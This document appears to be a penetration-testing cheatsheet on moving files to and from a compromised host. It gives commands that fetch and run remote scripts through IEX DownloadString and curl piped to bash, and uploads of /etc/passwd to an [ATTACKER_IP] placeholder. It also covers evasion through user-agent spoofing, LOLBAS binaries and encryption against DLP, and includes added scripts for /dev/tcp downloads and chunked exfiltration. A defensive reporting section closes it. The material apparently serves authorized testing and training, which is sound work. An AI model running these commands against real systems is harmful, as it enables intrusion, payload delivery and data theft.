🛡️ Methodology Checklist

  • Confirm outbound connectivity from target: HTTP, DNS, SMB available?
  • Choose method: PowerShell IWR (Windows) / wget/curl (Linux) / base64 (universal)
  • Stand up HTTP server on attacker: python3 -m http.server 8080
  • Transfer file and verify hash matches on both ends
  • Clean up dropped files after use (OPSEC)
  • Use encrypted transfer (HTTPS) in sensitive environments

🎯 Operational Context

Use when: Transfer blocked or method unclear; quick lookup table to match OS + available tool to transfer method.
Think Dumber First: Before trying exotic methods, check: does target have python3? curl? wget? nc? SMB access? Pick the simplest working method. /tmp noexec? Use /dev/shm. Windows without PowerShell? Use certutil.
Skip when: N/A; quick reference document.


⚡ Tactical Cheatsheet

Placeholders: [ATTACKER_IP] is the box that serves or listens (the attacker machine); [TARGET_IP] is the compromised host; [LISTENER_IP] is whichever side runs the netcat listener. Download commands run on the target and point at the attacker.

Command → Tactical Outcome

  python3 -m http.server 80
      → Start HTTP server (serves files from the current dir; run it from the directory holding your tools)
  python3 -m uploadserver [PORT]
      → Start HTTP upload server (accepts POST uploads at /upload; pip3 install uploadserver)
  sudo impacket-smbserver share . -smb2support -user [USER] -password [PASS]
      → SMB share of the current dir (authenticated; current Windows builds refuse unauthenticated guest access, so set credentials)
  sudo wsgidav --host=0.0.0.0 --port=80 --root=. --auth=anonymous
      → WebDAV server (anonymous, over HTTP on 80)
  sudo systemctl enable ssh && sudo systemctl start ssh
      → Enable SSH on the attacker box for SCP transfers
  IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]/script.ps1')
      → Fileless PS download + execute (nothing hits disk, but AMSI still scans the in-memory script)
  (New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/file','C:\Users\Public\file')
      → PS download to disk
  Invoke-WebRequest http://[ATTACKER_IP]/file -UserAgent ([Microsoft.PowerShell.Commands.PSUserAgent]::Chrome) -OutFile file
      → PS download with spoofed UA
  copy \\[ATTACKER_IP]\share\file.exe
      → SMB copy from the attacker share (Windows)
  net use n: \\[ATTACKER_IP]\share /user:[USER] [PASS]
      → Mount the attacker SMB share as drive N:
  wget http://[ATTACKER_IP]/file -O /tmp/file
      → Linux wget download
  curl -o /tmp/file http://[ATTACKER_IP]/file
      → Linux curl download
  curl http://[ATTACKER_IP]/script.sh | bash
      → Linux fileless execution (the script runs as it streams; nothing is written to disk)
  exec 3<>/dev/tcp/[ATTACKER_IP]/80; echo -e "GET /file HTTP/1.0\r\n\r\n" >&3; cat <&3 > file
      → Bash /dev/tcp fallback (no curl/wget/nc); HTTP/1.0 makes the server close the socket, and the saved file still starts with the HTTP response headers, so strip them before use
  nc -lvnp [PORT] > file
      → Netcat receive file (listener side)
  nc -q 0 [LISTENER_IP] [PORT] < file
      → Netcat send file (-q 0 closes once stdin hits EOF; OpenBSD nc uses -N)
  cat < /dev/tcp/[ATTACKER_IP]/443 > file
      → Bash receive from a netcat listener when the target has no nc (attacker side: nc -lvnp 443 < file)
  scp user@[TARGET_IP]:/path/file .
      → SCP pull from remote
  scp file user@[TARGET_IP]:/path/
      → SCP push to remote
  base64 -w 0 file; echo
      → Encode for copy-paste (Linux; -w 0 disables line wrapping so it pastes as one line)
  echo -n '[BASE64]' | base64 -d > file
      → Decode copy-pasted base64 (Linux)
  [IO.File]::WriteAllBytes("C:\file",[Convert]::FromBase64String("[BASE64]"))
      → Decode base64 to file (Windows PowerShell)
  curl -X POST https://[ATTACKER_IP]/upload -F 'files=@/etc/passwd' --insecure
      → Upload to uploadserver over HTTPS (--insecure accepts the self-signed certificate)
  curl -T /etc/passwd http://[ATTACKER_IP]:9001/SecretDir/loot.txt
      → Upload via an Nginx PUT endpoint (needs dav_methods PUT in the server config)
  openssl enc -aes256 -iter 100000 -pbkdf2 -in file -out file.enc
      → Encrypt before exfil (Linux; prompts for a passphrase, -pbkdf2 avoids OpenSSL's deprecated key derivation)
  openssl enc -d -aes256 -iter 100000 -pbkdf2 -in file.enc -out file
      → Decrypt received file (Linux; flags must match the encrypt side)
  certutil.exe -urlcache -split -f http://[ATTACKER_IP]/file file
      → LOLBAS download (heavily signatured; expect AV/EDR alerts)
  bitsadmin /transfer job /priority foreground http://[ATTACKER_IP]/file C:\Temp\file
      → LOLBAS download (lower profile than certutil, but BITS jobs are logged in the Microsoft-Windows-Bits-Client event log)
  python3 -c 'import urllib.request;urllib.request.urlretrieve("http://[ATTACKER_IP]/file","file")'
      → Python download one-liner
  php -r '$f=file_get_contents("http://[ATTACKER_IP]/file");file_put_contents("file",$f);'
      → PHP download one-liner
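The /dev/tcp fallback above has a catch the one-liner hides: everything the server sends, headers included, lands in the output file, and a 404 page is saved just as happily as the real file. The following is an added example, not code from the original cheatsheet, showing the fetch done with a status check and the header block removed. /dev/tcp requires bash; the helper functions themselves are POSIX sh. The host, port, path and file names are whatever you pass in; the sample response at the bottom is constructed so the header stripping can be exercised with no server running.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): /dev/tcp download that saves the
# HTTP body only. The cheatsheet one-liner writes the response headers into the
# file; this checks the status line and discards the headers first.

# strip_http_headers: read an HTTP response on stdin, fail unless the status is
# 200, drop the header block and pass the body through untouched. The shell's
# read builtin consumes a pipe one byte at a time, so cat receives exactly the
# bytes that follow the blank line (binary bodies are not altered).
strip_http_headers() {
    cr=$(printf '\r')
    IFS= read -r status || return 1
    status=${status%"$cr"}
    case "$status" in
        "HTTP/1."[01]" 200 "*) ;;
        *) printf 'unexpected status: %s\n' "$status" >&2; return 1 ;;
    esac
    while IFS= read -r line; do
        line=${line%"$cr"}
        [ -z "$line" ] && break
    done
    cat
}

# http_get_devtcp HOST PORT PATH OUTFILE: GET http://HOST:PORT/PATH via /dev/tcp.
# HTTP/1.0 plus Connection: close makes the server end the stream, so cat
# terminates instead of hanging on a kept-alive socket.
http_get_devtcp() {
    host=$1; port=$2; path=$3; out=$4
    exec 3<>"/dev/tcp/$host/$port" || return 1
    printf 'GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host" >&3
    strip_http_headers <&3 > "$out"; rc=$?
    exec 3<&-
    return "$rc"
}

# Constructed sample response, so the header stripping can be exercised offline.
sample_response() {
    printf 'HTTP/1.0 200 OK\r\nServer: SimpleHTTP/0.6\r\nContent-Length: 11\r\n\r\nhello world'
}

# Usage on the target (attacker serving with python3 -m http.server 80):
#   http_get_devtcp 10.10.14.5 80 /linpeas.sh /dev/shm/linpeas.sh
```

Hash the result with sha256sum afterwards, exactly as with any other method; the status check only guards against the wrong-file case, not against a truncated transfer.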

🔬 Deep Dive & Workflow

Quick Selection Matrix

Scenario → Best Method

  HTTP available, Windows target → IWR / WebClient.DownloadFile
  HTTP available, Linux target → wget or curl
  SMB (445) open → impacket-smbserver + copy
  HTTP to attacker blocked or filtered → WinRM PSSession (Copy-Item -ToSession) or Netcat; WebDAV only helps when SMB is blocked but HTTP is not
  AppLocker blocks PS → LOLBAS (BITSAdmin, Extrac32)
  No tools on target → /dev/tcp bash or code one-liners (python3, php)
  Sensitive data → Encrypt first: OpenSSL (Linux) / AES PS (Windows)
  Stealth needed → Spoof UA; use BITSAdmin or GfxDownloadWrapper
  Copy-paste only → Base64 encode/decode, hash on both ends

Attacker Server Setup Priority

# 1. Simple download server
python3 -m http.server 80
 
# 2. Upload server (for exfil)
python3 -m uploadserver 8000
 
# 3. SMB (for Windows targets)
sudo impacket-smbserver share . -smb2support -user user -password pass
 
# 4. WebDAV (HTTP/S allowed, SMB blocked)
sudo wsgidav --host=0.0.0.0 --port=80 --root=. --auth=anonymous

Exam Mental Checklist

  1. Confirm connectivity: Can victim reach attacker IP? (ping, check VPN tun0 IP; ICMP is often filtered, so a failed ping does not prove HTTP is blocked)
  2. Try HTTP first; it is the easiest to set up
  3. Check firewall/UA filtering: if blocked, spoof UA or change protocol
  4. If AV kills file: try fileless IEX or encode payload
  5. Verify integrity before executing: sha256sum / md5sum (Linux) or Get-FileHash (Windows, SHA256 by default) and compare against the hash on the attacker side

🛠️ Troubleshooting & Edge Cases

Problem: Transfer method unknown for target
  Cause: OS not confirmed
  Fix: Check uname -a (Linux) or systeminfo (Windows) first; match to cheatsheet

Problem: All HTTP methods blocked
  Cause: Egress filtering
  Fix: Try DNS exfil, ICMP tunnel, or SMB if port 445 is open to the attack box

Problem: File corrupts in transit
  Cause: Binary vs text mode (or a truncated paste)
  Fix: Use base64 encode/decode to ensure a safe transfer: base64 file > file.b64 → transfer → base64 -d file.b64 > file; compare sha256sum on both ends afterwards

Problem: Large file transfer too slow
  Cause: Limited bandwidth
  Fix: Split: split -b 10m file part_ → transfer parts → cat part_* > file; hash the reassembled file, since one missing part gives a silently truncated result

Problem: Transfer detected by DLP
  Cause: Content inspection
  Fix: Encrypt before transfer: openssl enc -aes-256-cbc -pbkdf2 -iter 100000 -in file -out file.enc -k password (same derivation as the cheatsheet; without -pbkdf2 OpenSSL falls back to its deprecated key derivation). Encryption hides the content, not the transfer: an opaque high-entropy blob leaving the host can itself be flagged.
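The three fixes above (base64 for text-safe transport, split for slow links, a hash check before anything is executed) are usually combined by hand and the hash step gets skipped. The following is an added example, not code from the original cheatsheet, that does all three as a sender-side pack and a receiver-side unpack. It assumes GNU coreutils (split -d, sha256sum -c, base64); the .manifest/.sha256/.part.NNN naming is this example's own convention, not anything the page prescribes.

```shell
#!/bin/sh
# Added example (not from the original page): pack a file for a slow or
# text-only channel and verify the reassembled copy on the other side.
# Assumes GNU coreutils. Sender runs pack_file, receiver runs unpack_file.

# pack_file FILE PREFIX CHUNK_BYTES
# Splits FILE into numbered parts, records the sha256 of the whole file and of
# every raw part, then base64-encodes each part so it survives copy-paste or a
# text-mode transfer. Send the .b64 parts plus the .manifest and .sha256 files.
pack_file() {
    file=$1; prefix=$2; chunk=$3
    split -b "$chunk" -d -a 3 "$file" "$prefix.part." || return 1   # prefix.part.000, 001, ...
    sha256sum "$file" | cut -d' ' -f1 > "$prefix.sha256"            # whole-file hash
    sha256sum "$prefix".part.[0-9][0-9][0-9] > "$prefix.manifest"    # per-part hashes
    for p in "$prefix".part.[0-9][0-9][0-9]; do
        base64 "$p" > "$p.b64" && rm "$p" || return 1
    done
}

# unpack_file PREFIX OUTFILE
# Decodes the parts, checks each one against the manifest (a bad paste or a
# truncated part fails here, before anything is executed), reassembles them in
# numeric order and checks the whole-file hash. Non-zero on any mismatch.
# Run it in the directory holding the parts, with the same PREFIX the sender used.
unpack_file() {
    prefix=$1; out=$2
    for b in "$prefix".part.[0-9][0-9][0-9].b64; do
        base64 -d "$b" > "${b%.b64}" || return 1
    done
    sha256sum -c --quiet "$prefix.manifest" || return 1
    cat "$prefix".part.[0-9][0-9][0-9] > "$out" || return 1
    [ "$(sha256sum "$out" | cut -d' ' -f1)" = "$(cat "$prefix.sha256")" ]
}

# Usage (constructed input; on an engagement FILE is the tool or the loot):
#   sender:   pack_file linpeas.sh lp 10485760     # lp.part.000.b64 ... lp.manifest lp.sha256
#   receiver: unpack_file lp linpeas.sh && echo "hashes match"
```

The three-digit numeric suffix keeps the shell glob in numeric order for up to 1000 parts, which is what makes the plain cat reassembly safe; the manifest check tells you which part to resend when a paste went wrong instead of leaving you with a file that merely fails to run.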

📝 Reporting Trigger

Finding Title: Unrestricted File Transfer Enables Tool and Payload Delivery
Impact: Ability to freely transfer files to/from target systems enables payload delivery, data exfiltration, and tool deployment that amplifies post-exploitation capabilities.
Root Cause: No egress filtering restricting outbound connections from server workloads. No DLP controls monitoring file transfer activity.
Recommendation: Implement egress filtering for server workloads. Deploy DLP to monitor unusual file transfers. Restrict outbound protocols to business-required services only. Monitor for LOL binary network activity (certutil, bitsadmin, and similar binaries making outbound connections).